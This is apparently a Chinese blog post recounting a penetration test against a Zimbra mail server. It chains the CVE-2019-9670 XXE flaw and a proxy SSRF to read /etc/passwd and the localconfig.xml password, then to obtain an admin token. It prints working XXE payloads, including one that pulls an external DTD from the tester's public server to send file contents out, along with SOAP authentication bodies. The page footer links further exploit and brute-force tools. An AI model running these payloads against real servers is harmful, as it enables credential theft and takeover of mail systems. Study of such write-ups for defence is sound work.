zimbra漏洞利用

最新推荐文章于 2023-08-03 10:30:00 发布
最新推荐文章于 2023-08-03 10:30:00 发布
阅读量4k 收藏 1
点赞数 2
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kzyyx/article/details/108316587
版权

记一次渗透测试zimbra漏洞利用

当时通过界面判断判断出开发利用zimbra搭建的网站。zimbra又存在多个漏洞。
1.首先通过利用了CVE-2019-9670 XXE漏洞来尝试读取/etc/passwd
在这里插入图片描述读取文件成功,证明此漏洞可以被成功利用。
2.接下来读取zimbra的配置文件获取密码,因为配置文件时xml文件,因此需要使用外部dtd获取信息。
请求接口:Post:/Autodiscover/Autodiscover.xml
Zimbra配置文件位置为/conf/localconfig.xml
在这里插入图片描述在公网IP上创建dtd文件,内容如上图所示并通过python搭建http服务。调用公网上的dtd读取配置文件,获取zimbra用户密码。
在这里插入图片描述
3.通刚刚获取的密码获取低权限的token

请求接口:Post: /service/soap
在这里插入图片描述
4.利用ssrf漏洞获通过proxy接口,访问admin的soap接口获取高权限Token

请求接口:Post:
/service/proxy?target=https://127.0.0.1:7071/service/admin/soap
PS:注意事项

Host:后面加端口7071
Cookie中设置Key为ZM_ADMIN_AUTH_TOKEN,值为上面请求所获取的token。
发送同上Body内容,但是AuthRequest的xmlns要改为:urn:zimbraAdmin,否则获取的还是普通权限的Token
在这里插入图片描述
获取高权限以后,下一步正常情况应该是上传文件getshell,但是这个测试环境目标文件夹被写死了,我的root权限也没办法写入文件,后续通过第一步的xxe任意文件浏览进行的信息收集,发现在他的上传文件存默认目录下直接存在webshell,直接拿到的权限。

XXE代码:
1.

<!DOCTYPE xxe [
<!ELEMENT name ANY
>
<!ENTITY xxe SYSTEM
"file:///etc/passwd" >]>
 <Autodiscover
xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
    <Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
    </Request>
</Autodiscover>
<!DOCTYPE Autodiscover [
<!ENTITY % dtd SYSTEM "http://公网服务器/dtd">
%dtd;
%all;
]>
<Autodiscover
xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&fileContents;</AcceptableResponseSchema>
</Request>
</Autodiscover>
<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
   <soap:Header>
       <context xmlns="urn:zimbra">
           <userAgent name="ZimbraWebClient - SAF3 (Win)" version="5.0.15_GA_2851.RHEL5_64"/>
       </context>
   </soap:Header>
   <soap:Body>
     <AuthRequest xmlns="urn:zimbraAccount">
        <account by="adminName">zimbra</account>
        <password>上一步得到密码</password>
     </AuthRequest>
   </soap:Body>
</soap:Envelope>`

4.和3一样上面有说明。

此文章存在问题请联系作者删除相关问题。
参考链接:写的很清楚
https://blog.csdn.net/weixin_40709439/article/details/90136596
https://www.bbsmax.com/A/kvJ31mgAdg/

kzyyx
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
zimbra邮箱在线口令爆破脚本
02-23
利用python编写的脚本,用于zimbra邮箱服务器的用户口令在线爆破。
SCANV团队:警惕Zimbra高危安全漏洞
爱尖刀科技媒体 - 曲子龙
12-10 1145
【警惕Zimbra高危安全漏洞】近日,scanv团队监测到国外安全研究者在exploit-db网站上披露的关于Zimbra高危“0day”安全漏洞及攻击代码,攻击者利用漏洞可读取邮件服务器上的任意文件,通过获取到的LDAP信息,即可得到所有用户的密码HASH散列。   用户密码采用OpenLADP SHA算法,通过GPU运算即可暴力破解,该漏洞将为企业或机构带来非常严重的数据泄露风险。攻击者还
开源邮件平台Zimbra 出现新漏洞,用户登录凭据可被盗
smellycat000的专栏
06-15 1768
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士研究人员发现 Zimbra 邮件套件中又出现一个高危漏洞 (CVE-2022-27924),如遭成功利用可导致未认证攻击者窃取用户明文密码且无需任何用户交互。研究员在报告中指出,“通过对受害者邮箱后续的访问权限,攻击者可能提升对目标组织机构的访问权限,并获得对多种内部服务的访问权限,窃取高度敏感信息。”CVE-2022-...
Zimbra 远程代码执行漏洞(CVE-2019-9670)漏洞分析
sxr__nc的博客
04-19 3749
漏洞的主要利用手法是通过。符号没有进行处理,就会导致上述类型的攻击,攻击者在发送上述类型的数据包的时候可以新建一个。的内容,这样一来处理数据会很方便,但同时也会有巨大的安全隐患:如果把目标。获取,其实只需要将上边的数据包中的字段修改下即可直接获取到高权限的。,在解析的过程中遇到实体的引用会直接获取相应的内容,即这里碰到。函数的处理流程,在整体的处理过程中对于请求的数据包,只针对。两个字段进行的解析,在解析的过程中会判断获取到的邮箱地址和。免费、简单,已经获得了广泛的支持,方便大众的使用。
Zimbra漏洞
公众号shadow sock7
08-19 1547
参考: https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html https://nvd.nist.gov/vuln/detail/CVE-2019-9670 https://nvd.nist.gov/vuln/detail/CVE-2016-9924 XXE CVE-2016-9924, CVE-2018-20...
邮箱部署zimbra
01-06
邮箱服务器部署
Zimbra工具
11-17
Zimbra是一款强大的开源协作套件,主要以其专业的电子邮件服务而闻名。它为组织提供了全面的邮件管理解决方案,包括日历、联系人、任务管理、即时消息和协作工具。Zimbra工具集成了多种功能,使得企业能够高效地进行...
2022年HW前沿漏洞利用库.pdf
06-30
服务漏洞部分涵盖了Jenkins、Microsoft Exchange Server、Zimbra、Zabbix、Nagios、Webmin、Redis、Openssl和Rsync等多个服务的漏洞。这些漏洞可能会导致服务崩溃、数据泄露和未经授权的访问等问题。 中间件漏洞...
Zimbra 小于 8.8.11版本 XXE GetShell EXP.rar
05-08
Zimbra邮件系统远程代码执行漏洞GetShell 漏洞描述: 漏洞利用XXE和ProxyServlet SSRF 漏洞拿到 admin authtoken 后,通过文件上传在服务端执行任意代码,威胁程度极高。当Zimbra服务端打来Memcached缓存服务是...
zmzcoreport:Zimbra ZCO 报告脚本
06-09
Zimbra ZCO 报告脚本概述根据 Zimbra 邮箱.log 文件报告当前使用的 Zimbra Connector for Outlook 版本。 此脚本将报告以空格分隔的登录日期、名称和地址、ZCO 版本、使用此版本的最近日期以及可以在日志文件中找到...
Zimbra Domain Admin:Zimbra开源版的Zimbra Domain Admin-开源
05-08
Zimbra开源版的Zimbra Domain Admin。 从Zimbra Soap API开发PHP Web应用程序。 Zimbra Domain Admin可以列出,添加,删除和更改其用户域的密码,而无需Zimbra全局管理员权限。 PHP框架:Laravel 5.8软件版本PHP 7.1.3+ Zimbra 8+ Bootstrap 4 Star Admin模板
TA473 使用 Zimbra 漏洞攻击欧洲与北约的邮件系统
wangluoanquan111的博客
08-03 1345
研究人员跟踪发现了部分可能是自定义 CSRF JavaScript 代码的实例,这些代码通过 CVE-2022-27926 来进行攻击。TA473 将其作为URL 超链接嵌入钓鱼邮件的正文中,这些 CSRF JavaScript 代码会由存在漏洞的邮件服务器执行。这些 JavaScript代码复制并依赖于模拟本机 Web 邮件门户的 JavaScript 代码,以返回攻击目标的用户名、密码与 CSRF Token 等关键 Web请求详细信息。
黑客正在利用Zimbra ZCS中的未修复RCE漏洞
smellycat000的专栏
10-10 788
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Zimbra 公司的企业协作软件和邮件平台中存在一个严重的远程代码执行漏洞且正遭活跃利用,目前尚不存在补丁。该漏洞的编号是CVE-2022-41352。该漏洞的CVSS评分为9.8,可导致攻击者上传任意文件并在受影响安装程序上执行恶意操作。网络安全公司Rapid7 在分析文章中指出,“该漏洞是因为Zimbra的反病毒引擎 Amavis扫描进站邮件...
Zimbra CVE-2019-9670 XXE + CVE-2019-9621 SSRF 漏洞复现
部分学习记录
03-12 2094
炒冷饭复现:cve-2019-9670 xxe + cve-2019-9621 ssrf
Zimbra 远程代码执行漏洞(CVE-2019-9670)环境搭建
sxr__nc的博客
04-12 1239
Zimbra是著名的开源系统,提供了一套开源协同办公套件包括WebMail,日历,通信录,Web文档管理和创作。一体化地提供了邮件收发、文件共享、协同办公、即时聊天等一系列解决方案。
CVE-2018-6882 Zimbra邮件系统XSS漏洞利用
weixin_30343157的博客
05-08 1461
CVE-2018-6882是一个存储型XSS漏洞利用漏洞可获取目标邮箱的收件箱、发件箱等邮件内容。也可以给目标邮箱绑定一个“辅助邮箱”,当目标邮箱收到新邮件时“辅助邮箱”也会收到相同的邮件,实现对目标邮箱的实时监控。 漏洞细节请大家参考这篇文章:https://www.securify.nl/advisory/SFY20180101/cross-site-scripting-vu...
[EXP]CVE-2019-9621 Zimbra<8.8.11 GetShell Exploit(配合Cscan可批量)
weixin_30414245的博客
05-06 953
发现时间 2019年03月18日 威胁目标 采用Zimbra邮件系统的企业 主要风险 远程代码执行 攻击入口 localconfig.xml 配置文件 使用漏洞 CVE-2019-9621 受影响应用 ZimbraCollabora...
CVE-2022-27925Zimbra Collaboration存在路径穿越漏洞最终导致RCE
include_voidmain的博客
07-07 2497
CVE-2022-27925Zimbra Collaboration存在路径穿越漏洞最终导致RCE
Zimbra 0day exploit / Privilegie escalation via LFI
cnbird's blog
12-07 1949
# Exploit Title: Zimbra 0day exploit / Privilegie escalation via LFI # Date: 06 Dec 2013 # Exploit Author: rubina119 # Contact Email : rubina119[at]gmail.com # Vendor Homepage: http://www.
zimbra docker
最新发布
08-19
Zimbra 是一种企业级邮件和协作平台,而 Docker 是一种容器化平台。如果你想在 Docker 中部署 Zimbra,你可以使用现有的 Zimbra Docker 镜像来进行部署。 Zimbra Docker 镜像是由社区开发的,可以在 Docker Hub 上找到。你可以使用以下命令从 Docker Hub 下载并运行 Zimbra Docker 镜像: ``` docker run --name zimbra -p 25:25 -p 80:80 -p 443:443 -p 587:587 -p 110:110 -p 143:143 \ -p 993:993 -p 995:995 -p 5222:5222 -p 7071:7071 \ -h mail.example.com \ -d zimbra/zimbra-community-edition ``` 上述命令将创建一个名为 "zimbra" 的容器,并启动 Zimbra 社区版。你可以根据需要修改端口映射和主机名等参数。请确保在运行之前已经安装了 Docker。 请注意,Zimbra Docker 镜像是由社区维护的,不属于官方支持范围之内。因此,在使用之前,请查阅相关文档和社区讨论以获取更多信息和支持。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值